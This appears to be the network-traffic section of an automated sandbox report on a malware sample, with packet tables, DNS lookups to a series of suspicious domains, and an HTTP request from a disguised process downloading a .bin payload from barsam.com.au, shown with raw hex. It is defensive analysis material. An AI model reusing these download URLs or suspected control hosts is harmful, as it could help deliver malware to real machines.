May 10, 2022 14:27:27.196446896 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.196455956 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.196619034 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.196681023 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.196713924 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.196768045 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.196799040 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.196798086 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.196976900 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.197067976 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.197132111 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.197194099 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.197268963 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.197283983 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.197304964 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.197352886 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.197385073 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.197459936 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.197534084 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.197644949 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.197655916 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.197813034 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.197988033 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.198168039 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.204550028 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.204595089 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.204751968 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.204834938 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.204926014 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.205106020 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.205107927 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.205156088 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.205463886 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.205715895 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.205756903 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.205849886 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.205872059 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.205964088 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.206052065 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.206142902 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.206176043 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.206224918 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.206338882 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.206403971 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.206458092 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.206578970 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.206713915 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.206763029 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.206828117 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.206937075 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.206993103 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.207083941 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.207112074 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.207209110 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.207293034 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.207389116 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.207422018 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.207465887 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.207590103 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.207642078 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.207707882 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.207815886 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.207997084 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.212918997 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.213174105 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.213236094 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.213565111 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.213648081 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.213742971 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.213922024 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.213977098 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.214368105 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.214405060 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.214531898 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.215003967 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.215079069 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.215111971 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.215221882 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.215584993 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.215627909 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.215684891 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.215715885 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.215744972 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.215821981 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216092110 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216140032 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216195107 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216226101 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216254950 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216339111 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216368914 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216417074 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216447115 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216476917 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216506004 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216567993 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216602087 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216629982 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216687918 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216718912 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216747046 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216794968 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216825008 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216854095 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.216988087 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.222115040 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.222189903 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.222223043 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.222250938 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.222321033 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.222354889 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:29:09.024483919 CEST	49784	80	192.168.11.20	209.99.40.222
May 10, 2022 14:29:09.168960094 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.169301987 CEST	49784	80	192.168.11.20	209.99.40.222
May 10, 2022 14:29:09.169404030 CEST	49784	80	192.168.11.20	209.99.40.222
May 10, 2022 14:29:09.356550932 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.460515022 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.460592985 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.460649014 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.460700989 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.460753918 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.460808039 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.460839033 CEST	49784	80	192.168.11.20	209.99.40.222
May 10, 2022 14:29:09.460863113 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.460896015 CEST	49784	80	192.168.11.20	209.99.40.222
May 10, 2022 14:29:09.460917950 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.460971117 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.461014032 CEST	49784	80	192.168.11.20	209.99.40.222
May 10, 2022 14:29:09.461025000 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.461173058 CEST	49784	80	192.168.11.20	209.99.40.222
May 10, 2022 14:29:09.461234093 CEST	49784	80	192.168.11.20	209.99.40.222
May 10, 2022 14:29:09.548854113 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.598635912 CEST	49784	80	192.168.11.20	209.99.40.222
May 10, 2022 14:29:09.605499029 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.605612993 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.605674982 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.605720997 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.605765104 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.605804920 CEST	49784	80	192.168.11.20	209.99.40.222
May 10, 2022 14:29:09.605809927 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.605854034 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:09.605858088 CEST	49784	80	192.168.11.20	209.99.40.222
May 10, 2022 14:29:09.605992079 CEST	49784	80	192.168.11.20	209.99.40.222
May 10, 2022 14:29:09.606086969 CEST	49784	80	192.168.11.20	209.99.40.222
May 10, 2022 14:29:09.606134892 CEST	49784	80	192.168.11.20	209.99.40.222
May 10, 2022 14:29:09.750370026 CEST	80	49784	209.99.40.222	192.168.11.20
May 10, 2022 14:29:11.614901066 CEST	49785	80	192.168.11.20	209.99.40.222
May 10, 2022 14:29:11.749288082 CEST	80	49785	209.99.40.222	192.168.11.20
May 10, 2022 14:29:11.749496937 CEST	49785	80	192.168.11.20	209.99.40.222
May 10, 2022 14:29:11.751184940 CEST	49785	80	192.168.11.20	209.99.40.222
May 10, 2022 14:29:11.886008978 CEST	80	49785	209.99.40.222	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 10, 2022 14:22:48.949217081 CEST	50601	53	192.168.11.20	1.1.1.1
May 10, 2022 14:22:49.465421915 CEST	53	50601	1.1.1.1	192.168.11.20
May 10, 2022 14:24:20.139080048 CEST	60455	53	192.168.11.20	1.1.1.1
May 10, 2022 14:24:21.103101969 CEST	53	60455	1.1.1.1	192.168.11.20
May 10, 2022 14:24:44.155855894 CEST	54881	53	192.168.11.20	1.1.1.1
May 10, 2022 14:24:44.690813065 CEST	53	54881	1.1.1.1	192.168.11.20
May 10, 2022 14:25:05.279268980 CEST	62371	53	192.168.11.20	1.1.1.1
May 10, 2022 14:25:05.320645094 CEST	53	62371	1.1.1.1	192.168.11.20
May 10, 2022 14:25:21.430221081 CEST	51262	53	192.168.11.20	1.1.1.1
May 10, 2022 14:25:21.446269989 CEST	53	51262	1.1.1.1	192.168.11.20
May 10, 2022 14:25:43.659826040 CEST	65129	53	192.168.11.20	1.1.1.1
May 10, 2022 14:25:43.782633066 CEST	53	65129	1.1.1.1	192.168.11.20
May 10, 2022 14:25:43.783061981 CEST	65129	53	192.168.11.20	9.9.9.9
May 10, 2022 14:25:44.784173965 CEST	65129	53	192.168.11.20	9.9.9.9
May 10, 2022 14:25:45.573015928 CEST	53	65129	9.9.9.9	192.168.11.20
May 10, 2022 14:25:46.538938999 CEST	53	65129	9.9.9.9	192.168.11.20
May 10, 2022 14:26:03.702572107 CEST	55679	53	192.168.11.20	1.1.1.1
May 10, 2022 14:26:03.715585947 CEST	53	55679	1.1.1.1	192.168.11.20
May 10, 2022 14:26:23.854129076 CEST	54230	53	192.168.11.20	1.1.1.1
May 10, 2022 14:26:23.995635986 CEST	53	54230	1.1.1.1	192.168.11.20
May 10, 2022 14:26:46.912503004 CEST	57910	53	192.168.11.20	1.1.1.1
May 10, 2022 14:26:47.132783890 CEST	53	57910	1.1.1.1	192.168.11.20
May 10, 2022 14:27:05.938769102 CEST	49439	53	192.168.11.20	1.1.1.1
May 10, 2022 14:27:06.129107952 CEST	53	49439	1.1.1.1	192.168.11.20
May 10, 2022 14:27:24.747474909 CEST	60944	53	192.168.11.20	1.1.1.1
May 10, 2022 14:27:25.120599985 CEST	53	60944	1.1.1.1	192.168.11.20
May 10, 2022 14:27:45.305309057 CEST	64077	53	192.168.11.20	1.1.1.1
May 10, 2022 14:27:45.499526978 CEST	53	64077	1.1.1.1	192.168.11.20
May 10, 2022 14:28:07.659502983 CEST	50156	53	192.168.11.20	1.1.1.1
May 10, 2022 14:28:08.176717997 CEST	53	50156	1.1.1.1	192.168.11.20
May 10, 2022 14:28:26.316116095 CEST	63138	53	192.168.11.20	1.1.1.1
May 10, 2022 14:28:26.363797903 CEST	53	63138	1.1.1.1	192.168.11.20
May 10, 2022 14:28:48.526295900 CEST	52016	53	192.168.11.20	1.1.1.1
May 10, 2022 14:28:48.570111036 CEST	53	52016	1.1.1.1	192.168.11.20
May 10, 2022 14:29:08.708797932 CEST	53294	53	192.168.11.20	1.1.1.1
May 10, 2022 14:29:08.849102020 CEST	53294	53	192.168.11.20	9.9.9.9
May 10, 2022 14:29:09.023366928 CEST	53	53294	9.9.9.9	192.168.11.20
May 10, 2022 14:29:09.190802097 CEST	53	53294	1.1.1.1	192.168.11.20
May 10, 2022 14:29:27.860749006 CEST	61321	53	192.168.11.20	1.1.1.1
May 10, 2022 14:29:28.001193047 CEST	61321	53	192.168.11.20	9.9.9.9
May 10, 2022 14:29:28.050453901 CEST	53	61321	1.1.1.1	192.168.11.20
May 10, 2022 14:29:28.066871881 CEST	53	61321	9.9.9.9	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 10, 2022 14:22:48.949217081 CEST	192.168.11.20	1.1.1.1	0xa48e	Standard query (0)	barsam.com.au	A (IP address)	IN (0x0001)
May 10, 2022 14:24:20.139080048 CEST	192.168.11.20	1.1.1.1	0x28b3	Standard query (0)	www.dujh.xyz	A (IP address)	IN (0x0001)
May 10, 2022 14:24:44.155855894 CEST	192.168.11.20	1.1.1.1	0x4d08	Standard query (0)	www.dujh.xyz	A (IP address)	IN (0x0001)
May 10, 2022 14:25:05.279268980 CEST	192.168.11.20	1.1.1.1	0x8681	Standard query (0)	www.gpusforfun.com	A (IP address)	IN (0x0001)
May 10, 2022 14:25:21.430221081 CEST	192.168.11.20	1.1.1.1	0x6afa	Standard query (0)	www.borneadomicile.com	A (IP address)	IN (0x0001)
May 10, 2022 14:25:43.659826040 CEST	192.168.11.20	1.1.1.1	0xf27	Standard query (0)	www.liesdevocalist.store	A (IP address)	IN (0x0001)
May 10, 2022 14:25:43.783061981 CEST	192.168.11.20	9.9.9.9	0xf27	Standard query (0)	www.liesdevocalist.store	A (IP address)	IN (0x0001)
May 10, 2022 14:25:44.784173965 CEST	192.168.11.20	9.9.9.9	0xf27	Standard query (0)	www.liesdevocalist.store	A (IP address)	IN (0x0001)
May 10, 2022 14:26:03.702572107 CEST	192.168.11.20	1.1.1.1	0x151f	Standard query (0)	www.actu-infomail.com	A (IP address)	IN (0x0001)
May 10, 2022 14:26:23.854129076 CEST	192.168.11.20	1.1.1.1	0xa070	Standard query (0)	www.clickleaser.com	A (IP address)	IN (0x0001)
May 10, 2022 14:26:46.912503004 CEST	192.168.11.20	1.1.1.1	0x2a56	Standard query (0)	www.getsuzamtir.xyz	A (IP address)	IN (0x0001)
May 10, 2022 14:27:05.938769102 CEST	192.168.11.20	1.1.1.1	0x156a	Standard query (0)	www.schnellekreditfinanz.com	A (IP address)	IN (0x0001)
May 10, 2022 14:27:24.747474909 CEST	192.168.11.20	1.1.1.1	0xbf2a	Standard query (0)	www.repaircilinic.com	A (IP address)	IN (0x0001)
May 10, 2022 14:27:45.305309057 CEST	192.168.11.20	1.1.1.1	0x846f	Standard query (0)	www.revboxx.com	A (IP address)	IN (0x0001)
May 10, 2022 14:28:07.659502983 CEST	192.168.11.20	1.1.1.1	0xc0d0	Standard query (0)	www.shantelleketodietofficial.site	A (IP address)	IN (0x0001)
May 10, 2022 14:28:26.316116095 CEST	192.168.11.20	1.1.1.1	0xd472	Standard query (0)	www.thebeautystore.store	A (IP address)	IN (0x0001)
May 10, 2022 14:28:48.526295900 CEST	192.168.11.20	1.1.1.1	0xa0d4	Standard query (0)	www.projectduckling.com	A (IP address)	IN (0x0001)
May 10, 2022 14:29:08.708797932 CEST	192.168.11.20	1.1.1.1	0xc7dc	Standard query (0)	www.linqxw.com	A (IP address)	IN (0x0001)
May 10, 2022 14:29:08.849102020 CEST	192.168.11.20	9.9.9.9	0xc7dc	Standard query (0)	www.linqxw.com	A (IP address)	IN (0x0001)
May 10, 2022 14:29:27.860749006 CEST	192.168.11.20	1.1.1.1	0xe7ae	Standard query (0)	www.tandelawnmaintenance.com	A (IP address)	IN (0x0001)
May 10, 2022 14:29:28.001193047 CEST	192.168.11.20	9.9.9.9	0xe7ae	Standard query (0)	www.tandelawnmaintenance.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 10, 2022 14:20:59.897835016 CEST	1.1.1.1	192.168.11.20	0xe75c	No error (0)	www-bing-com.dual-a-0001.a-msedge.net	dual-a-0001.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
May 10, 2022 14:20:59.897835016 CEST	1.1.1.1	192.168.11.20	0xe75c	No error (0)	dual-a-0001.a-msedge.net		13.107.21.200	A (IP address)	IN (0x0001)
May 10, 2022 14:20:59.897835016 CEST	1.1.1.1	192.168.11.20	0xe75c	No error (0)	dual-a-0001.a-msedge.net		204.79.197.200	A (IP address)	IN (0x0001)
May 10, 2022 14:21:00.065850973 CEST	1.1.1.1	192.168.11.20	0xc702	No error (0)	devcenterapi.azure-api.net	apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
May 10, 2022 14:21:00.065850973 CEST	1.1.1.1	192.168.11.20	0xc702	No error (0)	devcenterapi-eastus-01.regional.azure-api.net	apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net		CNAME (Canonical name)	IN (0x0001)
May 10, 2022 14:21:00.702919006 CEST	1.1.1.1	192.168.11.20	0x6ac6	No error (0)	evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.net	e-0009.e-msedge.net		CNAME (Canonical name)	IN (0x0001)
May 10, 2022 14:21:00.702919006 CEST	1.1.1.1	192.168.11.20	0x6ac6	No error (0)	e-0009.e-msedge.net		13.107.5.88	A (IP address)	IN (0x0001)
May 10, 2022 14:22:49.465421915 CEST	1.1.1.1	192.168.11.20	0xa48e	No error (0)	barsam.com.au		203.170.86.89	A (IP address)	IN (0x0001)
May 10, 2022 14:24:21.103101969 CEST	1.1.1.1	192.168.11.20	0x28b3	No error (0)	www.dujh.xyz		180.76.247.231	A (IP address)	IN (0x0001)
May 10, 2022 14:24:44.690813065 CEST	1.1.1.1	192.168.11.20	0x4d08	No error (0)	www.dujh.xyz		180.76.247.231	A (IP address)	IN (0x0001)
May 10, 2022 14:25:05.320645094 CEST	1.1.1.1	192.168.11.20	0x8681	Name error (3)	www.gpusforfun.com	none	none	A (IP address)	IN (0x0001)
May 10, 2022 14:25:21.446269989 CEST	1.1.1.1	192.168.11.20	0x6afa	No error (0)	www.borneadomicile.com		217.160.0.18	A (IP address)	IN (0x0001)
May 10, 2022 14:25:43.782633066 CEST	1.1.1.1	192.168.11.20	0xf27	Server failure (2)	www.liesdevocalist.store	none	none	A (IP address)	IN (0x0001)
May 10, 2022 14:25:45.573015928 CEST	9.9.9.9	192.168.11.20	0xf27	Server failure (2)	www.liesdevocalist.store	none	none	A (IP address)	IN (0x0001)
May 10, 2022 14:25:46.538938999 CEST	9.9.9.9	192.168.11.20	0xf27	Server failure (2)	www.liesdevocalist.store	none	none	A (IP address)	IN (0x0001)
May 10, 2022 14:26:03.715585947 CEST	1.1.1.1	192.168.11.20	0x151f	Name error (3)	www.actu-infomail.com	none	none	A (IP address)	IN (0x0001)
May 10, 2022 14:26:23.995635986 CEST	1.1.1.1	192.168.11.20	0xa070	No error (0)	www.clickleaser.com		198.23.49.173	A (IP address)	IN (0x0001)
May 10, 2022 14:26:47.132783890 CEST	1.1.1.1	192.168.11.20	0x2a56	No error (0)	www.getsuzamtir.xyz		199.192.29.215	A (IP address)	IN (0x0001)
May 10, 2022 14:27:06.129107952 CEST	1.1.1.1	192.168.11.20	0x156a	No error (0)	www.schnellekreditfinanz.com	schnellekreditfinanz.com		CNAME (Canonical name)	IN (0x0001)
May 10, 2022 14:27:06.129107952 CEST	1.1.1.1	192.168.11.20	0x156a	No error (0)	schnellekreditfinanz.com		68.65.122.211	A (IP address)	IN (0x0001)
May 10, 2022 14:27:25.120599985 CEST	1.1.1.1	192.168.11.20	0xbf2a	No error (0)	www.repaircilinic.com		185.53.179.171	A (IP address)	IN (0x0001)
May 10, 2022 14:27:45.499526978 CEST	1.1.1.1	192.168.11.20	0x846f	Name error (3)	www.revboxx.com	none	none	A (IP address)	IN (0x0001)
May 10, 2022 14:28:08.176717997 CEST	1.1.1.1	192.168.11.20	0xc0d0	Name error (3)	www.shantelleketodietofficial.site	none	none	A (IP address)	IN (0x0001)
May 10, 2022 14:28:26.363797903 CEST	1.1.1.1	192.168.11.20	0xd472	Name error (3)	www.thebeautystore.store	none	none	A (IP address)	IN (0x0001)
May 10, 2022 14:28:48.570111036 CEST	1.1.1.1	192.168.11.20	0xa0d4	Name error (3)	www.projectduckling.com	none	none	A (IP address)	IN (0x0001)
May 10, 2022 14:29:09.023366928 CEST	9.9.9.9	192.168.11.20	0xc7dc	No error (0)	www.linqxw.com		209.99.40.222	A (IP address)	IN (0x0001)
May 10, 2022 14:29:09.190802097 CEST	1.1.1.1	192.168.11.20	0xc7dc	No error (0)	www.linqxw.com		209.99.40.222	A (IP address)	IN (0x0001)
May 10, 2022 14:29:28.050453901 CEST	1.1.1.1	192.168.11.20	0xe7ae	Name error (3)	www.tandelawnmaintenance.com	none	none	A (IP address)	IN (0x0001)
May 10, 2022 14:29:28.066871881 CEST	9.9.9.9	192.168.11.20	0xe7ae	Name error (3)	www.tandelawnmaintenance.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

barsam.com.au

www.borneadomicile.com

www.clickleaser.com

www.getsuzamtir.xyz

www.schnellekreditfinanz.com

www.repaircilinic.com

www.linqxw.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49759	203.170.86.89	80	C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Timestamp	kBytes transferred	Direction	Data
May 10, 2022 14:22:49.687557936 CEST	9163	OUT	GET /bin_FCWtLoO90.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: barsam.com.au Cache-Control: no-cache
May 10, 2022 14:22:49.895020962 CEST	9165	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 May 2022 12:22:49 GMT Content-Type: application/octet-stream Content-Length: 189504 Connection: keep-alive Last-Modified: Sun, 08 May 2022 23:20:05 GMT Accept-Ranges: bytes Data Raw: 09 0d d1 87 83 5f 02 7c 06 a6 47 b4 7c 71 88 3e 81 ea b3 f9 29 1a 59 bc 3d 06 80 2c d6 15 04 39 01 22 a1 08 81 b9 b1 f0 ff 16 7e 90 d7 85 1d e5 b5 02 e3 29 36 01 eb 26 41 02 6a d1 65 4e 36 f6 a5 23 b9 db 92 25 c2 ec ea f8 52 fd ad 2b ec 16 7f b6 10 b1 1f 2b d8 29 dc 49 9d bb d9 f7 f9 6c 25 93 b6 43 56 08 17 7a 94 cd 97 e7 0f ac 5b f9 64 d0 74 47 02 fa 68 9b 5c 3c 21 11 a3 15 08 43 47 50 41 54 02 13 8b 3a d1 89 95 76 1a ce 84 76 32 7f 66 a7 06 d9 c6 48 90 08 65 fa 73 59 70 d9 ea a6 bc b3 8b ca c1 48 b1 e7 05 a2 e0 c1 17 9a 0e 90 0d be 23 07 04 6e c8 35 5d f3 97 81 34 1b 5b 5d 22 f2 5a 32 d5 05 90 0d ca 70 46 1d f1 fb 00 b0 76 43 fd 97 08 47 5a 8a fa 24 a2 59 72 31 20 ec ae bc 60 91 e8 f7 da cd b0 7d 5d 11 06 28 6b d0 da 14 fe 26 20 13 62 8c ca 7a a0 c0 fa 24 66 2b a0 43 70 1d 6d 43 01 d6 bb e6 54 05 70 7b 07 8e cd 11 a3 9a fc 81 66 28 00 2a c0 b0 54 e0 1a ad a5 c5 ee 78 b9 6e f2 3e 6f ae a4 5d cd 6c 1f da d6 d3 4e 98 e0 19 92 64 9d a3 b2 c2 d0 8a 19 e9 9b 75 45 02 e4 90 57 51 64 75 62 9d 34 95 8f 2c a4 13 8f 00 f5 83 b7 90 51 26 00 b4 0e 91 96 99 40 93 22 54 08 b9 01 2f 5e 45 05 dd e4 74 68 2a 1e 86 32 69 c5 70 04 5a 21 ca 95 71 31 3a b2 07 1f 84 1a 98 82 42 3e 1a 1c ae 58 5b 04 40 7a 44 6a 6e 15 9a e1 1b 3b 74 36 b6 65 6f 2b ad 86 e8 a9 bb 72 c0 dc 72 6c fb b9 66 f2 4c 2b df 1a 84 1e 92 5e 4b 25 d6 d3 36 9e d7 a8 99 ff 2c 24 43 07 90 c8 06 aa 8c 86 c8 bd 05 07 90 36 a4 80 85 86 6c 6a 20 b4 98 46 e0 11 e8 8c 6a ec ed 35 8f b7 f1 7c bd fe 0a 3a ac de 73 c4 6f e9 76 1b 7e 71 7e ca af ae 34 eb 08 79 f5 52 42 ad d0 d7 10 5a c7 76 8c b5 d1 64 f6 c0 9b f3 d7 61 30 7a a2 09 d0 97 18 4d 97 ec f2 8b 8f 5e 27 d6 72 92 dd b3 76 72 45 4e b0 1d d4 d0 f0 7e 7d be ed 07 a0 d7 cf 27 88 64 03 d8 05 94 bc 60 e3 f5 39 f3 13 d0 05 0f d5 9e 22 66 3e 94 88 56 65 b7 b7 af ee 0f 69 82 dc 5f 64 c0 02 db fc ac ef 73 bd 76 a7 38 39 70 90 ef 7d 70 d9 b7 49 42 f1 65 14 db 64 be 57 3c b9 7f 8c f6 f3 28 72 be bf c0 e2 68 80 f7 8d 52 78 85 36 7a d1 ee 20 58 81 6f de a2 07 81 c0 2b 02 55 26 5f 83 9f a6 c9 2e 70 c2 9d 68 99 ac 08 76 d9 6b 6e 79 32 5c 10 5f 87 fa 96 9e b3 d6 0a 4e 03 97 a2 fe 9b bf 5f f9 d8 90 a7 3c e2 3b d4 47 8e 3c f2 f5 b1 2d 7c 8e 50 63 26 8c 73 90 94 4f 39 7c 5f e1 34 db 60 b9 02 05 8f ed a4 d1 3e b2 fd f3 8a f4 